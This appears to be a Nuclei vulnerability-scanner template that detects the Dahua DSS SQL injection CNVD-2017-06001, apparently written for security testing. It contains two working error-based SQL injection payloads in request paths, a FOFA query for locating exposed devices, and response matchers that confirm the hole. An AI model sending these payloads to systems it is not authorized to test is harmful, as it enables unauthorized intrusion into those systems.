id: CNVD-2017-06001
info:
name: Dahua DSS - SQL Injection
author: napgh0st,ritikchaddha
severity: high
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
metadata:
verified: true
max-request: 2
fofa-query: "app=\"dahua-DSS\""
tags: cnvd,cnvd2017,sqli,dahua,vuln
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
- "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "XPATH syntax error:"
- "c8c605999f3d8352d7bb792cf3fdb25"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502201cbad3efd3a310ebaaa7b7f2982245c3e51b4f6a984676f348150e745a354a55022100915c92eac10ccc4604a8e6f64460d5d2bdb18b036054d205eb044435bee55cae:922c64590222798bb761d5b6d8e72950